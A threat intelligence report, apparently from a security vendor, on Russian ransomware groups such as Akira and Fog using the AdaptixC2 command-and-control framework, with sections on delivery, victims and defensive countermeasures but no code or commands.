Executive Summary

Russian ransomware gangs have escalated their operational sophistication by weaponizing the open-source AdaptixC2 command-and-control (C2) framework for advanced cyberattacks. Originally developed for legitimate red teaming and penetration testing, AdaptixC2 has been rapidly adopted by threat actors due to its modular, cross-platform architecture, robust encryption, and flexible post-exploitation capabilities. Intelligence from multiple OSINT sources confirms that groups such as Akira and Fog are leveraging AdaptixC2 to facilitate initial access, lateral movement, and ransomware deployment, often in conjunction with loader malware like CountLoader and social engineering campaigns. The abuse of AdaptixC2 exemplifies the growing risk posed by dual-use open-source security tools, and underscores the need for organizations to enhance their detection, response, and threat intelligence capabilities.

Threat Actor Profile

The primary actors exploiting AdaptixC2 are Russian-speaking ransomware gangs, notably those associated with the Akira and Fog ransomware families. These groups are characterized by their technical agility, rapid adoption of emerging tools, and reliance on a network of Initial Access Brokers (IABs) who facilitate entry into target environments. The developer of AdaptixC2, known as “RalfHacker,” maintains a significant presence on Telegram (RalfHackerChannel) and X (formerly Twitter), where updates and operational guidance are disseminated to a large Russian-speaking cybercriminal audience. The threat actors’ operational model is opportunistic, targeting a broad spectrum of industries and geographies, with a particular focus on North America and Europe. Their campaigns are marked by the use of phishing, social engineering, and AI-generated scripts to bypass traditional security controls and establish persistent, covert access.

Technical Analysis of Malware/TTPs

AdaptixC2 is a modular, open-source C2 framework released on GitHub in August 2024 by “RalfHacker.” The server component is written in Golang, while the GUI client is developed in C++ using the QT framework, supporting Windows, Linux, and macOS platforms. Key features include fully encrypted communications over mTLS, HTTP, SMB, and BTCP protocols; remote command execution; credential and screenshot management; a remote terminal; and extensible post-exploitation modules.

Weaponization of AdaptixC2 typically begins with delivery via the CountLoader malware loader, which is distributed through phishing emails, fake IT support calls (notably via Microsoft Teams), and AI-generated PowerShell scripts. Once deployed, AdaptixC2 establishes encrypted C2 channels, complicating detection and enabling attackers to execute commands, escalate privileges, harvest credentials, and move laterally within the network. The framework’s support for multiple protocols and encrypted listeners allows for resilient, stealthy persistence, while its modular design facilitates rapid adaptation to evolving defensive measures.

The technical sophistication of AdaptixC2 is further evidenced by its integration with Telegram for C2 marketing and coordination, as well as its active development and promotion within Russian-language cybercriminal forums. The framework’s open-source nature and ease of customization have accelerated its adoption among ransomware operators seeking to evade detection and maximize operational flexibility.

Exploitation in the Wild

Since Q3 2025, there has been a marked increase in the use of AdaptixC2 in ransomware campaigns, as documented by threat intelligence firms such as Silent Push and Palo Alto Networks Unit 42. The Akira and Fog ransomware groups have been observed leveraging AdaptixC2 for post-exploitation activities, including privilege escalation, lateral movement, and deployment of ransomware payloads. Initial access is frequently obtained via CountLoader, which is delivered through phishing campaigns, fake help desk interactions, and malicious PowerShell scripts generated by AI.

Notable campaigns have exploited Microsoft Teams as a vector for social engineering, with attackers posing as IT support to trick users into executing loader malware. Once inside the network, AdaptixC2 is used to establish encrypted C2 channels, execute commands, and deploy ransomware. The use of Telegram channels such as RalfHackerChannel (with over 28,000 subscribers) facilitates coordination, tool distribution, and operational updates among Russian-speaking threat actors.

The opportunistic nature of these campaigns means that a wide range of sectors—including critical infrastructure, healthcare, education, and manufacturing—are at risk. The global reach of these operations is amplified by the use of IABs, who sell access to compromised networks to ransomware operators.

Victimology and Targeting

While specific victim organizations are not always publicly disclosed, analysis of ransomware leak sites, threat intelligence reports, and underground forums indicates that the primary targets of AdaptixC2-enabled campaigns are organizations in North America and Europe. The affected sectors include critical infrastructure, healthcare, education, manufacturing, and financial services. The selection of victims is often opportunistic, driven by the availability of exploitable vulnerabilities and the potential for high ransom payouts.

The use of CountLoader and AI-generated scripts enables attackers to bypass traditional email security controls and endpoint defenses, increasing the likelihood of successful compromise. The reliance on social engineering, particularly through platforms like Microsoft Teams, further broadens the attack surface and increases the risk to organizations with remote or hybrid workforces.

Mitigation and Countermeasures

To defend against the threat posed by AdaptixC2 and associated ransomware campaigns, organizations should implement a multi-layered security strategy. This includes monitoring for unusual outbound connections on mTLS, HTTP, SMB, and BTCP protocols, as these are commonly used by AdaptixC2 for encrypted C2 communications. Behavioral analytics should be deployed to detect abnormal beaconing patterns and suspicious command execution activity.

Security teams should proactively hunt for CountLoader and AdaptixC2 artifacts using YARA rules and network signatures, as provided by threat intelligence sources such as Silent Push. Monitoring for new or unauthorized PowerShell scripts—especially those exhibiting signs of AI generation or obfuscation—is critical for early detection of post-exploitation activity.

Blocking known malicious Telegram channels and C2 infrastructure, as well as maintaining up-to-date threat intelligence feeds, will help reduce exposure to these campaigns. Regular security awareness training, with a focus on phishing and social engineering tactics, is essential to mitigate the risk of initial access. Finally, organizations should ensure that their incident response plans are regularly tested and updated to address the evolving tactics, techniques, and procedures (TTPs) employed by ransomware operators.

References

The Hacker News: Russian Ransomware Gangs Weaponize Open-Source AdaptixC2, Silent Push: AdaptixC2 Ties to Russian Criminal Underworld, eSecurityPlanet: AdaptixC2 Weaponization, MITRE ATT&CK Techniques, Akira Ransomware Profile, AdaptixC2 GitHub, Securityinbits: AdaptixC2 Defender Guide, RedHeadSec: AdaptixC2 Overview

About Rescana

Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to proactively identify, assess, and mitigate cyber risks across their extended supply chain. Our platform leverages cutting-edge threat intelligence, automation, and analytics to provide actionable insights and enhance organizational resilience against emerging threats. For more information or to discuss how Rescana can support your cybersecurity strategy, we are happy to answer questions at ops@rescana.com.